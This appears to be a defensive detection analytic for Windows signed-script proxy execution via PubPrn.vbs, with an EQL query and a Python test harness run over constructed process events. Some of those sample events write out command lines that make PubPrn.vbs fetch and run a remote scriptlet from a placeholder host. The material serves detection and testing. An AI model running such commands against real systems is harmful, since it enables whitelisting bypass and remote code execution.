Proxied Execution via Signed Scripts
Signed scripts such as PubPrn.vbs can be used to proxy execution from a remote site while bypassing signature validation restrictions and potentially application whitelisting.
| id: | 0d62a884-1052-44d0-a76c-1f4845e348d2 |
|---|---|
| categories: | enrich |
| confidence: | low |
| os: | windows |
| created: | 7/26/2019 |
| updated: | 7/26/2019 |
MITRE ATT&CK™ Mapping
| tactics: | Defense Evasion, Execution |
|---|---|
| techniques: | T1216 Signed Script Proxy Execution |
Query
process where subtype.create and
process_name in ("cscript.exe", "wscript.exe") and
command_line == "* *.vbs* *script:http*"
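The following is an added example, not part of the original analytic or of the EQL project: it re-implements the query's three clauses in Python and runs them over constructed process events, so the matching behaviour can be checked before deployment. The event field names follow the query; the sample events, the `event` helper and the assumption that wildcard comparison is whole-string and case-insensitive are ours.

```python
import re

# Values copied from the query on this page.
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
COMMAND_LINE_PATTERN = "* *.vbs* *script:http*"


def wildcard_to_regex(pattern):
    """Compile a pattern in which '*' matches any run of characters."""
    # Assumption: matching is case-insensitive and covers the whole string.
    body = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.compile(body, re.IGNORECASE | re.DOTALL)


COMMAND_LINE_RE = wildcard_to_regex(COMMAND_LINE_PATTERN)


def matches(event):
    """Return True when a process event satisfies every clause of the query."""
    return (
        event.get("event_type") == "process"
        and event.get("subtype") == "create"
        and event.get("process_name", "").lower() in SCRIPT_HOSTS
        and COMMAND_LINE_RE.fullmatch(event.get("command_line", "")) is not None
    )


def event(name, command_line, subtype="create"):
    """Build a constructed process event using the field names in the query."""
    return {"event_type": "process", "subtype": subtype,
            "process_name": name, "command_line": command_line}


PUBPRN = r"C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs"
REMOTE = "script:https://example.invalid/a.sct"  # constructed placeholder URL

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    event("cscript.exe", f"cscript.exe {PUBPRN} localhost {REMOTE}"),
    event("WScript.exe", "WScript.exe PUBPRN.VBS 127.0.0.1 SCRIPT:HTTP://example.invalid/a"),
    event("cscript.exe", f'cscript.exe {PUBPRN} printsrv "LDAP://CN=Printers,DC=example,DC=invalid"'),
    event("cscript.exe", f"cscript.exe {PUBPRN} localhost {REMOTE}", "terminate"),
    event("findstr.exe", 'findstr.exe /c:"pubprn.vbs localhost script:http" notes.txt'),
]

HITS = [e for e in SAMPLE_EVENTS if matches(e)]
```

Only the first two events are hits: the third is ordinary PubPrn.vbs usage with an LDAP container argument, the fourth is not a process creation, and the fifth carries the strings in its command line but is not a script host.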